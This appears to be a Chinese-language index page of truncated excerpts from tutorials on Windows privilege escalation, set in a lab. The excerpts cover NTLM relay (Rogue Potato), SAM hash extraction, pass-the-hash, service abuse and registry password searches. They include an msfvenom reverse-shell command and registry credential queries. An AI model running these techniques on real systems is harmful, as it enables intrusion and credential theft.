一共14篇文章
专题:第1期
-
Rogue Potato - 土豆提权
4:35当前帖子内容 Rogue Potato是使用欺骗攻击的攻击名称 同时进行NTLM中继攻击以获得系统权限 该攻击诱使Windows作为系统进行身份验证 用户使用NTLM访问一个假的HTTP服务器;NTLM凭据 然后NTLM凭据将其转告到SMB以获得命令执行 提权条件 1.本地NTLM中继获取SYSTEM令牌 2.SeImpersonatePrivilege特权 测试中任意用户都可以通过本地N…...- REX_Null1
- 10
- 0
-
SAM和SYSTEM文件进行备份读取
视频播放至7:15后才是该帖子内容 Security Accounts Manager又称SAM,用于存储本地用户帐户的安全信息。 这些哈希用密钥加密的,但这个密钥可以在SYSTEM的文件中找到。 如果你能读取到SAM和系统文件,则可以提取到哈希的密码。 SAM/SYSTEM Locations SAM和SYSTEM文件位于C:\\Windows\\System32\\config directo…... -
利用存储的凭证提升权限
通过存储凭证提升权限 RunAs 通过存储凭证提升权限 在目标主机传shell弹回来后,我们应该立即开始执行手动枚举,以便在我们开始使用工具之前更好地了解我们正在使用的是什么。 这挺重要,因为搜索存储的凭据应该是获得据点前首先执行的手动命令之一。 手动枚举存储的凭据 查找存储的凭据可以使用一个简单的命令来完成: cmdkey /list 这里我们可以看到本地Admin账户的凭证已经存储,可以用来执…... -
利用可执行服务文件提权
利用可执行服务文件提权 我们的服务启动的时候是伴随着一个exe文件启动的,而我们如果对这个exe文件和目录有可写权限就可以用恶意文件去覆盖掉正常的文件进行提权 msf生成shell root@ip-10-10-4-200:~/Desktop# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.4.200 LPORT=6666 -f exe …... -
弱服务权限daclsvc提权
弱服务权限daclsvc提权 模拟获取到内网机器 xfreerdp连接上去 xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.195.130 root@ip-10-10-25-36:~/Desktop# xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.195.130 connect…... -
哈希传递 - PassThe Hash
既然可以使用哈希进行身份验证,为什么还要破解密码哈希? winexe winexe在kali里面自带,用于在linux平台连接windows机器 环境要求:开启文件共享,即smb服务;禁用UAC远程限制 将完整的管理员哈希与 pth-winexe 一起使用,以生成一个以管理员身份运行的 shell,而无需破解其密码。 请记住,完整哈希包括 LM 和 NTLM 哈希,以冒号分隔: pth-winex…... -
搜索注册表处的密码提权
(由于某些原因,有时密码会被存储在注册表中。) 可以在注册表中搜索包含 "password "的键和值。 reg query HKLM /f password /t REG_SZ /s #本地机器注册表项 reg query HKCU /f password /t REG_SZ /s #当前用户注册表项 我们可以手动验证这些:(查询注册表) reg query "HK…... -
Scheduled Tasks - 计划任务提权
任务通常使用创建它们的用户的权限运行,但管理员可以配置以其他用户(包括系统)身份运行,那我们就可以利用这点进行提权 什么是Scheduled Tasks Scheduled Tasks是任务计划程序,Scheduled Tasks可以在计算机上自动执行你创建的任务。 原理: Task Scheduler通过监视你选择的条件(称为触发器),然后在满足这些条件时执行任务(例如 每 5 分钟)或由某个事…... -
可利用的 GUI 应用程序提权
在某些(较旧)版本的 Windows 中,用户可以获得使用管理员权限运行某些 GUI 应用的权限。 通常有许多方法可以生成来自GUI应用内的命令提示,包括使用原生 Windows 功能。 Since 父过程运行时具有管理员权限,生成的命令提示也将运行这些权限 实操 由于本文中的演示需要GUI,假设在初始枚举期间我们就找到了用户 user 登录的凭据并且使用RDP/3389 上打开。 启动 RDP会…...